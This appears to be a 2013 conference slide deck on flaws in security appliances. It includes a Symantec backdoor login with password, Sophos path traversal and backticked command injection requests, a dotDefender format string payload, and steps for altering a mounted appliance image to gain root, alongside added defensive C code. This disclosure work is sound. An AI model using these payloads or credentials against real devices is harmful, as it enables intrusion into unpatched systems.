(in)Security Software
By Alexander Antukh
May 26, 2013
/whoami
Alexander Antukh
 Security Consultant
 Offensive Security Certified Expert
 Interests: kittens and stuff
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
The answer
*sorry for my English
The answer
• Symantec Messaging Gateway
– Backdoor by design: code execution
• F5 BIG-IP
– SQL Injection, XXE: passwords… root access
• Applicure dotDefender WAF
– Format string vulnerability: code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection: command execution, admin account pwn
Security software products are the target of the trade ... already!
The answer
Symantec Messaging Gateway v.9.5.x
“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...”
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...”
The answer
F5 BIG-IP <= 11.2.0
sam/admin/reports/php/getSettings.php
The answer
AppliCure dotDefender WAF <= 4.26
“... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...”
Web Attack?
The answer
AppliCure dotDefender WAF <= 4.26
Error page can be configured in different ways. Vars to be added to the body of a custom page:
• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Looks nice…
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
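The dotDefender slides above describe a block page whose body is built from variables such as %IP% and then reaches a printf-style call (the deck names AP_PRINTF()), so a request header carrying conversion directives is parsed as a format string instead of text. The C program below is an added example, not dotDefender code and not taken from the deck: it shows the hardened shape, where %NAME% tokens are expanded by literal byte copy and untrusted values never become a format argument, plus a small detector that flags untrusted values containing printf directives. The function names, the %HOST% token and the sample values are assumptions made for this example; the exact dotDefender call is not on the page, so the vulnerable shape in the comment is the generic one.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not dotDefender code). The block page template uses
 * %NAME% tokens, as on the slides. The vulnerable shape the deck points at
 * is: expand the tokens, then pass the finished page to a printf-family
 * call as its *format* argument, e.g. ap_rprintf(r, page). A Host header
 * of "%666d..." is then parsed as conversion directives instead of text.
 * The exact dotDefender call is not on the page; this is the generic shape. */

struct var { const char *name; const char *value; };

/* 1 if s holds a '%' that printf would treat as a directive (anything but
 * the literal "%%"). A useful check on untrusted input before it is logged
 * or rendered through any formatting routine. */
int has_format_directive(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" is a literal percent */
        return 1;
    }
    return 0;
}

/* Expand %NAME% tokens in tpl into out by byte copy. Unknown tokens and
 * stray '%' are copied through unchanged; values are never interpreted.
 * Returns the number of bytes written, or -1 if out is too small. */
int expand_block_page(const char *tpl, const struct var *vars, size_t nvars,
                      char *out, size_t cap)
{
    size_t o = 0;
    const char *p = tpl;
    while (*p) {
        const char *src = NULL;
        size_t len = 0;
        if (*p == '%') {
            const char *end = strchr(p + 1, '%');
            if (end) {
                size_t nlen = (size_t)(end - p - 1);
                for (size_t i = 0; i < nvars; i++) {
                    if (strlen(vars[i].name) == nlen &&
                        memcmp(vars[i].name, p + 1, nlen) == 0) {
                        src = vars[i].value;
                        len = strlen(src);
                        p = end + 1;
                        break;
                    }
                }
            }
        }
        if (!src) { src = p; len = 1; p++; }          /* literal byte */
        if (o + len >= cap) return -1;
        memcpy(out + o, src, len);
        o += len;
    }
    out[o] = '\0';
    return (int)o;
}

/* Constructed demo: server IP plus a hostile Host header value (assumed). */
const char *demo_block_page(void)
{
    static char page[256];
    const struct var vars[] = {
        { "IP",   "10.0.0.1" },
        { "HOST", "%666d%n.example" },   /* constructed hostile value */
    };
    if (expand_block_page("<%IP%> Host: %HOST%", vars, 2, page, sizeof page) < 0)
        return "";
    return page;
}

int main(void)
{
    const char *page = demo_block_page();
    /* Emit with a fixed format (or fputs); the page is data, not a format. */
    printf("%s\n", page);
    printf("Host value flagged: %d\n", has_format_directive("%666d%n.example"));
    return 0;
}
```

The important property is that the hostile Host value survives into the output as plain text: the only format string in the program is the constant `"%s\n"`, so nothing the client sends can ever select a conversion directive.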
The answer
Sophos Web Protection Appliance <= 3.7.8.1
“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...”
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
Passwords!
The answer
Sophos Web Protection Appliance <= 3.7.8.1: Diagnostic Tools
POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
The answer
Sophos Web Protection Appliance <= 3.7.8.1: Block page (%%user_workstation%%)
https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60
The answer
Sophos Web Protection Appliance <= 3.7.8.1: Local Site List
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
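The three Sophos requests above all carry shell command substitution (a backtick-wrapped sleep) inside an ordinary parameter: a URL handed to wget, a client-ip rendered on the block page, a URL in the local site list. The C program below is an added example, not Sophos code: it decodes the parameter, validates it against a strict grammar (a dotted-quad for the address, a conservative allow-list for a URL given to wget), and starts wget through execvp so that no shell ever parses the value. The function names, the allow-list and the sample inputs are assumptions for this example; the sample inputs reuse the payload shapes shown on the slides.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example (not Sophos code). Two request parameters of the kind the
 * slides show: a client IP that is rendered on the block page, and a URL
 * that is fetched with wget. The vulnerable shape is to let the raw value
 * reach a shell, e.g.
 *     snprintf(cmd, sizeof cmd, "wget %s", url); system(cmd);
 * where url = "`sleep 5`" makes the shell run sleep before wget. The fix
 * below: decode, validate against a strict grammar, exec without a shell. */

/* Percent-decode a query value ('+' becomes a space). Returns 1 on
 * success, 0 on a malformed escape or when out is too small. */
int url_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (; *in; in++) {
        int c = (unsigned char)*in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return 0;
            char hex[3] = { in[1], in[2], '\0' };
            c = (int)strtol(hex, NULL, 16);
            in += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (o + 1 >= cap) return 0;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 1;
}

/* Strict dotted-quad: exactly four decimal octets 0..255 and nothing else,
 * so a value such as " `sleep 10`" can never pass as a client address. */
int is_valid_ipv4(const char *s)
{
    int octets = 0;
    while (*s) {
        if (!isdigit((unsigned char)*s)) return 0;
        long v = 0;
        int digits = 0;
        while (isdigit((unsigned char)*s)) {
            v = v * 10 + (*s - '0');
            if (++digits > 3) return 0;
            s++;
        }
        if (v > 255) return 0;
        octets++;
        if (*s == '.') {
            s++;
            if (!*s) return 0;          /* trailing dot */
        } else if (*s) {
            return 0;                   /* any other character */
        }
    }
    return octets == 4;
}

/* Conservative allow-list for a URL handed to wget: http(s) scheme and only
 * characters from a small safe set (an assumption for this example).
 * Backticks, quotes, spaces, '$', ';', '|' and '(' are rejected outright. */
int url_is_acceptable(const char *u)
{
    if (strncmp(u, "http://", 7) != 0 && strncmp(u, "https://", 8) != 0) return 0;
    for (const char *p = u; *p; p++)
        if (!isalnum((unsigned char)*p) && !strchr("-._~:/?=&%#+", *p)) return 0;
    return 1;
}

/* Fetch url with wget via fork/execvp: argv goes straight to the program,
 * no shell ever parses it. Returns wget's exit status, or -1 on refusal or
 * failure. Not exercised by the tests; shown for the hardened shape. */
int run_wget_without_shell(const char *url)
{
    if (!url_is_acceptable(url)) return -1;
    char *const argv[] = { "wget", "-q", "-O", "/dev/null", (char *)url, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execvp(argv[0], argv); _exit(127); }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs using the payload shapes from the slides. */
    const char *raw[] = { "%20%60sleep+10%60", "%60sleep%205%60", "10.0.0.7",
                          "https://example.com/page?x=1" };
    char v[128];
    for (size_t i = 0; i < sizeof raw / sizeof raw[0]; i++) {
        if (!url_decode(raw[i], v, sizeof v)) { puts("malformed"); continue; }
        printf("%-32s ip:%s url:%s\n", v,
               is_valid_ipv4(v) ? "ok" : "REJECT",
               url_is_acceptable(v) ? "ok" : "REJECT");
    }
    return 0;
}
```

Two design points: validation runs on the decoded value, since the slides' payloads arrive as %60 and only become backticks after decoding; and the allow-list is a second line of defence, not the fix itself. The fix is that `execvp` receives the URL as one argv element, so even a value that slipped past the check would be an argument to wget rather than text for a shell.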
Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Application testing and fuzzing
– Reverse engineering
– Source code analysis
• A short note on so called “security scanning” tools
Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
Vuln, where art thou?
*Move two matches to make it three equal squares
Sometimes it’s easier to find the vulnerability than it might be expected . . .
*doesn’t exist yet
And now for something completely different
QA